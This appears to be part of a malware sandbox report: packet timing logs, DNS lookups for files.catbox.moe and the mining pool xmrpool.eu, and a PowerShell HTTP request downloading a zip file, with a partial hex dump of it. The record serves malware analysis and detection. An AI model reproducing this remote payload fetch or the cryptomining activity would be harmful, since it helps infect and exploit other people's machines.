                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.161257029 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.161346912 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.161354065 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.161384106 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.161403894 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.188844919 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.188864946 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.188981056 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.188991070 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.189034939 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.306940079 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.306963921 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.307038069 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.307058096 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.307070017 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.307306051 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.315141916 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.315172911 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.315252066 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.315258026 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.315304995 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.323260069 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.323281050 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.323374033 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.323379993 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.323421001 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.330492973 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.330513954 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.330566883 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.330571890 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.330583096 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.330614090 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.337805986 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.337829113 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.337894917 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.337904930 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.337955952 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.346941948 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.346963882 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.347008944 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.347016096 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.347038031 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.347059965 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.354060888 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.354079962 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.354163885 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.354168892 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.354207993 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.381015062 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.381038904 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.381089926 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.381103039 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.381113052 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.381144047 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.499181986 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.499203920 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.499265909 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.499279022 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.499331951 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.507415056 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.507435083 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.507499933 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.507524014 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.507584095 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.514378071 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.514395952 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.514480114 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.514502048 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.514545918 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.522416115 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.522433043 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.522495031 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.522500992 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.522542953 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.530400038 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.530416012 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.530591965 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.530599117 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.530647039 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.533546925 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.533557892 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.533588886 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.533771038 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.533771038 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.533798933 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.533873081 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.538125992 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.538141966 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.538219929 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.538225889 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.538271904 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.539062023 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.539108038 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.539165974 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.539184093 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.539196968 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.539455891 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.546262980 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.546278954 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.546370029 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.546377897 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.546422005 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.574068069 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.574091911 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.574248075 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.574254036 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.574302912 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.605144978 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.605166912 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.605257034 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.605266094 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.605462074 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.611011982 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.611027956 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.611099958 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.611109018 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.611179113 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.617055893 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.617073059 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.617145061 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.617151976 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.617221117 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.622338057 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.622369051 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.622457981 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.622457981 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.622464895 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.622553110 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.678020000 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.678040981 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.678113937 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.678123951 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.678153992 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.678174019 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.683299065 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.683329105 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.683367968 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.683373928 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.683437109 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.683437109 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.689357996 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.689399004 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.689460993 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.689460993 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.689467907 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.689532995 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.691534042 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.691564083 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.691602945 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.691625118 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.691637993 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.691667080 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.699687004 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.699711084 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.699752092 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.699759007 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.699788094 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.699809074 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.706661940 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.706679106 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.706737041 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.706743002 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.706801891 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.714692116 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.714710951 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.714766979 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.714776039 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.714817047 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.722336054 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.722356081 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.722412109 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.722418070 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.722450972 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.722467899 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.729374886 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.729392052 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.729422092 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.729475021 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.729480982 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.729542017 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.730393887 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.730410099 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.730457067 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.730462074 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.730484009 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.730495930 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.738714933 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.738734961 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.738796949 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.738801956 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.738840103 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.765865088 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.765885115 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.765945911 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.765954971 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.765988111 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.766005993 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.797471046 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.797494888 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.797548056 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.797564030 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.797602892 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.803307056 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.803328037 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.803375006 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.803380966 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.803420067 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.809308052 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.809324980 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                Dec 6, 2024 10:25:57.337023973 CET192.168.2.71.1.1.10xfd66Standard query (0)time.windows.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 6, 2024 10:25:57.374243021 CET192.168.2.71.1.1.10xeb36Standard query (0)files.catbox.moeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 6, 2024 10:27:20.196244001 CET192.168.2.71.1.1.10x39a4Standard query (0)xmrpool.euA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 6, 2024 10:27:21.185065031 CET192.168.2.71.1.1.10x39a4Standard query (0)xmrpool.euA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                Dec 6, 2024 10:25:57.478610039 CET1.1.1.1192.168.2.70xfd66No error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Dec 6, 2024 10:25:57.758194923 CET1.1.1.1192.168.2.70xeb36No error (0)files.catbox.moe108.181.20.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 6, 2024 10:27:21.243527889 CET1.1.1.1192.168.2.70x39a4No error (0)xmrpool.eu51.89.217.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 6, 2024 10:27:21.322444916 CET1.1.1.1192.168.2.70x39a4No error (0)xmrpool.eu51.89.217.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                0192.168.2.749699108.181.20.354437096C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-12-06 09:25:59 UTC171OUTGET /d6pvcr.zip HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                Host: files.catbox.moe
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                2024-12-06 09:26:00 UTC546INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Fri, 06 Dec 2024 09:25:59 GMT
                                                                                                                                                                                                                                Content-Type: application/zip
                                                                                                                                                                                                                                Content-Length: 25002518
                                                                                                                                                                                                                                Last-Modified: Wed, 29 May 2024 00:49:36 GMT
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                ETag: "66567ba0-17d8216"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Content-Security-Policy: default-src 'self' https://files.catbox.moe; style-src https://files.catbox.moe 'unsafe-inline'; img-src 'self' data:; font-src 'self'; media-src 'self'; object-src 'self';
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                2024-12-06 09:26:00 UTC15838INData Raw: 50 4b 03 04 14 00 00 00 08 00 84 14 bd 58 ae e8 05 a9 3a 7f 00 00 18 17 01 00 12 00 00 00 70 79 6f 70 73 2f 5f 61 73 79 6e 63 69 6f 2e 70 79 64 ec 7d 0b 78 54 d5 b5 f0 49 c2 40 48 08 13 20 83 e1 e9 11 02 26 08 21 18 1f 89 11 9d 21 89 9c c1 09 44 9e 11 90 64 48 26 64 24 99 89 33 67 20 11 54 e8 24 ea 78 9c 16 ad 56 fb d0 5a f5 b6 b6 f6 b6 be 6a 11 bd 35 21 6a 08 0f 41 ac 16 a5 b7 5a 7b db 4e 18 1f d1 db f2 54 cf bf d6 da fb 9c 39 67 12 d0 de db fb ff df f7 ff ff 7c 24 fb 9c bd f6 5e 7b ed b5 d6 5e 6b ed b5 f7 84 aa d5 3b 84 34 41 10 86 c1 8f aa 0a c2 4e 81 7d ec c2 57 7f d2 53 04 61 f4 f9 bb 46 0b cf 8d 3c 70 c1 ce 14 d7 81 0b 96 37 79 83 62 6b c0 bf 21 e0 6e 11 eb dd 3e 9f 5f 16 d7 7b c4 40 c8 27 7a 7d 62 c5 92 65 62 8b bf c1 53 98 95 95 91 c7 71 7c 79 7e
                                                                                                                                                                                                                                Data Ascii: PKX:pyops/_asyncio.pyd}xTI@H &!!DdH&d$3g T$xVZj5!jAZ{NT9g|$^{^k;4AN}WSaF<p7ybk!n>_{@'z}bebSq|y~
                                                                                                                                                                                                                                2024-12-06 09:26:00 UTC16384INData Raw: 3e 86 f3 8c 73 da 2f 17 36 1b c2 74 71 9b 95 c8 77 fd 83 36 cb 9c bf 3e 1b f7 dc 89 30 d7 68 31 32 56 35 51 6c 49 9a 43 fb 43 b7 d1 f2 04 8c db c7 7c 4f e1 86 42 d1 9c 6e cd d0 b7 cc 34 15 9e f8 71 54 3b 0b b8 5d d0 f9 4d 2a cb 77 e2 01 5d a2 19 43 48 54 f3 df 9a f0 86 da 14 f2 c0 d3 93 84 9f 21 e6 e6 8c dc 2a a8 5f dd 90 27 a7 e0 7d 92 38 57 50 47 73 4d f6 07 5f a9 0f e7 8c 4c c0 21 f0 f6 ff 53 71 49 22 f5 75 96 6c df a0 55 84 bb 7d 64 0c cb f5 f1 e4 db b9 b2 7c 9c ee 84 62 78 99 29 68 a0 ed 2b f5 0a 18 c2 3f 86 77 33 93 a0 4c 39 7a cd 2f 27 32 9c 09 64 e8 a2 f4 34 09 2c 87 fa 7a b0 85 8d 21 70 39 a8 53 60 76 32 74 e3 96 34 18 86 7d 2d ad 72 3b cb 5f 0c 81 1a 3b eb 46 8f 22 61 63 a4 38 04 e9 1a 6b f4 5c 65 06 63 0f 4f 16 73 5e 19 92 4a fe 40 03 25 a0 68
                                                                                                                                                                                                                                Data Ascii: >s/6tqw6>0h12V5QlICC|OBn4qT;]M*w]CHT!*_'}8WPGsM_L!SqI"ulU}d|bx)h+?w3L9z/'2d4,z!p9S`v2t4}-r;_;F"ac8k\ecOs^J@%h
